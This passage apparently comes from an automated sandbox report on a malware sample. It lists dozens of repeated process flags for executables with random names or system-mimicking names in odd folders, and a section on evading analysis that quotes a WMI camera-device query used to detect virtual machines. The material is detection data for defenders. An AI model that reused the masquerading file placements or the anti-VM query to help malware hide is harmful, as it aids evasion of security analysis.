                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Recovery\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
